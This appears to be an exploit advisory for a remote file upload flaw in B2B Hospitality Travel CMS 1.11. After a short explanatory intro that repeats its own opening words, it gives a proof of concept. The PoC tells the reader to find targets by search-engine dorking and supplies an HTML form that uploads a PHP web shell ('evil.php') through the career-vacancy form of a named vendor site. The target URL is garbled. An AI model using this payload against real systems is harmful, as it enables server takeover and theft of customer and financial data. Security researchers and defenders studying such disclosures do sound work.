B2B Hospitality Travel CMS 1.11 Shell Upload

The "B2B Hospitality Travel CMS 1.11 Shell Upload" refers to The "B2B Hospitality Travel CMS 1.11 Shell Upload" refers to a critical Remote Code Execution (RCE) vulnerability found in version 1.11 of a specific B2B hospitality and travel content management system.

This flaw typically exploits insecure file upload functionality. An attacker can upload a malicious script (a "web shell") disguised as a legitimate file (e.g., an image or document) without proper validation.

Once uploaded and accessible via a web browser, this shell grants the attacker full control over the compromised web server. This includes the ability to execute arbitrary commands, access sensitive data (bookings, customer info, financial records), deface the website, or pivot to other systems within the network.

The vulnerability poses a severe risk to data integrity, privacy, and business operations. Immediate patching to a secure version and implementing robust input validation, file type/content checking, and secure storage for uploaded files are crucial mitigations.

=============================================================================================================================================
| # Title : B2B Hospitality Travel CMS 1.11 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits) |
| # Vendor : https://www.b2bhospitalityindia.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Save code As : poc.html

[+] Line 09 set your Target

[+] Link to the uploaded files :/uopload/evil.php

[+] use payload :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Career Vacancy Form</title>
</head>
<body>

<form name="enqForm" action="https://www/127.0.0.1/.b2bhospitalityindia.com/career-vacancy.php" method="POST" enctype="multipart/form-data">

<label for="job">Job:</label><br>
<input type="text" id="job" name="job" required><br><br>

<label for="name">Name:</label><br>
<input type="text" id="name" name="name" required><br><br>

<label for="additional_information">Additional Information:</label><br>
<textarea id="additional_information" name="additional_information" rows="5" cols="30"></textarea><br><br>

<label for="email">Email:</label><br>
<input type="email" id="email" name="email" required><br><br>

<label for="mobile">Mobile:</label><br>
<input type="text" id="mobile" name="mobile" required><br><br>

<label for="resume">Resume:</label><br>
<input type="file" id="resume" name="resume" accept=".pdf,.php,.docx" required><br><br>

<input type="submit" name="submit" value="Submit">

</form>

</body>
</html>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
============================================================